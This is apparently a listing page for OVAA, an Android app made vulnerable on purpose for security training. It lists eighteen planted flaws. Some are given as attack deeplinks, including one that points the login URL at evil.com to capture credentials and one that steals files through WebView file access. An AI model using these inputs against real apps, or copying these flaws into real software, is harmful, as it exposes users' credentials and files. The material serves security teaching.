All Projects → oversecured → Ovaa

oversecured / Ovaa

Licence: bsd-2-clause
Oversecured Vulnerable Android App

Programming Languages

java
68154 projects - #9 most used programming language

Projects that are alternatives of or similar to Ovaa

OversecuredVulnerableiOSApp
Oversecured Vulnerable iOS App
Stars: ✭ 138 (-9.21%)
Mutual labels:  mobile-security, appsec
Awesome Mobile Security
An effort to build a single place for all useful android and iOS security related stuff. All references and tools belong to their respective owners. I'm just maintaining it.
Stars: ✭ 1,837 (+1108.55%)
Mutual labels:  mobile-security, android-security
Evabs
An open source Android application that is intentionally vulnerable so as to act as a learning platform for Android application security beginners.
Stars: ✭ 173 (+13.82%)
Mutual labels:  mobile-security, android-security
dumproid
Android process memory dump tool without ndk.
Stars: ✭ 55 (-63.82%)
Mutual labels:  android-security, mobile-security
Dexcalibur
[Official] Android reverse engineering tool focused on dynamic instrumentation automation. Powered by Frida. It disassembles dex, analyzes it statically, generates hooks, discovers reflected methods, stores intercepted data and does new things from it. Its aim is to be an all-in-one Android reverse engineering platform.
Stars: ✭ 512 (+236.84%)
Mutual labels:  mobile-security, android-security
Rms Runtime Mobile Security
Runtime Mobile Security (RMS) 📱🔥 - is a powerful web interface that helps you to manipulate Android and iOS Apps at Runtime
Stars: ✭ 1,194 (+685.53%)
Mutual labels:  mobile-security, android-security
remote-adb-scan
pure python remote adb scanner + nmap scan module
Stars: ✭ 19 (-87.5%)
Mutual labels:  android-security, mobile-security
mobileAudit
Django application that performs SAST and Malware Analysis for Android APKs
Stars: ✭ 140 (-7.89%)
Mutual labels:  android-security, mobile-security
Adhrit
Android Security Suite for in-depth reconnaissance and static bytecode analysis based on Ghera benchmarks.
Stars: ✭ 399 (+162.5%)
Mutual labels:  mobile-security, android-security
Mobile Security Framework Mobsf
Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis.
Stars: ✭ 10,212 (+6618.42%)
Mutual labels:  mobile-security, android-security
Apkleaks
Scanning APK file for URIs, endpoints & secrets.
Stars: ✭ 2,707 (+1680.92%)
Mutual labels:  mobile-security, android-security
Atfuzzer
"Opening Pandora's Box through ATFuzzer: Dynamic Analysis of AT Interface for Android Smartphones" ACSAC 2019
Stars: ✭ 128 (-15.79%)
Mutual labels:  android-security
Websocket Fuzzer
HTML5 WebSocket message fuzzer
Stars: ✭ 115 (-24.34%)
Mutual labels:  appsec
Bag Of Holding
An application to assist in the organization and prioritization of software security activities.
Stars: ✭ 114 (-25%)
Mutual labels:  appsec
Bulwark
An organizational asset and vulnerability management tool, with Jira integration, designed for generating application security reports.
Stars: ✭ 113 (-25.66%)
Mutual labels:  appsec
Web Methodology
Methodology for high-quality web application security testing - https://github.com/tprynn/web-methodology/wiki
Stars: ✭ 142 (-6.58%)
Mutual labels:  appsec
Njsscan
njsscan is a semantic aware SAST tool that can find insecure code patterns in your Node.js applications.
Stars: ✭ 128 (-15.79%)
Mutual labels:  appsec
Gda Android Reversing Tool
GDA is a new fast and powerful decompiler in C++(working without Java VM) for the APK, DEX, ODEX, OAT, JAR, AAR, and CLASS file. which supports malicious behavior detection, privacy leaking detection, vulnerability detection, path solving, packer identification, variable tracking, deobfuscation, python&java scripts, device memory extraction, dat…
Stars: ✭ 2,332 (+1434.21%)
Mutual labels:  mobile-security
Droid Watcher
[OUTDATED & UNSUPPORTED] Droid Watcher - Android Spy Application
Stars: ✭ 103 (-32.24%)
Mutual labels:  android-security
Iosreextension
A fast and elegant extension for VSCode used for iOSre projects.
Stars: ✭ 139 (-8.55%)
Mutual labels:  mobile-security

Description

OVAA (Oversecured Vulnerable Android App) is an Android app that aggregates all the platform's known and popular security vulnerabilities.

List of vulnerabilities

This section only includes the list of vulnerabilities, without a detailed description or proof of concept. Examples from OVAA will receive detailed examination and analysis on our blog.

  1. Installation of an arbitrary login_url via deeplink oversecured://ovaa/login?url=http://evil.com/. Leads to the user's user name and password being leaked when they log in.
  2. Obtaining access to arbitrary content providers (not exported, but with the attribute android:grantUriPermissions="true") via deeplink oversecured://ovaa/grant_uri_permissions. The attacker's app needs to process oversecured.ovaa.action.GRANT_PERMISSIONS and pass intent to setResult(code, intent) with flags such as Intent.FLAG_GRANT_READ_URI_PERMISSION and the URI of the content provider.
  3. Vulnerable host validation when processing deeplink oversecured://ovaa/webview?url=....
  4. Opening arbitrary URLs via deeplink oversecured://ovaa/webview?url=http://evilexample.com. An attacker can use the vulnerable WebView setting WebSettings.setAllowFileAccessFromFileURLs(true) in the WebViewActivity.java file to steal arbitrary files by sending them XHR requests and obtaining their content.
  5. Access to arbitrary activities and acquiring access to arbitrary content providers in LoginActivity by supplying an arbitrary Intent object to redirect_intent.
  6. Theft of arbitrary files in MainActivity by intercepting an activity launch from Intent.ACTION_PICK and passing the URI to any file as data.
  7. Insecure broadcast to MainActivity containing credentials. The attacker can register a broadcast receiver with action oversecured.ovaa.action.UNPROTECTED_CREDENTIALS_DATA and obtain the user's data.
  8. Insecure activity launch in MainActivity with action oversecured.ovaa.action.WEBVIEW, containing the user's encrypted data in the query parameter token.
  9. Deletion of arbitrary files via the insecure DeleteFilesSerializable deserialization object.
  10. Memory corruption via the MemoryCorruptionParcelable object.
  11. Memory corruption via the MemoryCorruptionSerializable object.
  12. Obtaining read/write access to arbitrary files in TheftOverwriteProvider via path-traversal in the value uri.getLastPathSegment().
  13. Obtaining access to app logs via InsecureLoggerService. Leak of credentials in LoginActivity Log.d("ovaa", "Processing " + loginData).
  14. Use of the hardcoded AES key in WeakCrypto.
  15. Arbitrary Code Execution in OversecuredApplication by launching code from third-party apps with no security checks.
  16. Use of very wide file sharing declaration for oversecured.ovaa.fileprovider content provider in root entry.
  17. Hardcoded credentials to a dev environment endpoint in strings.xml in test_url entry.
  18. Arbitrary code execution via a DEX library located in a world-readable/writable directory.

Licensed under the Simplified BSD License

Copyright (c) 2020, Oversecured Inc

https://oversecured.com/

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].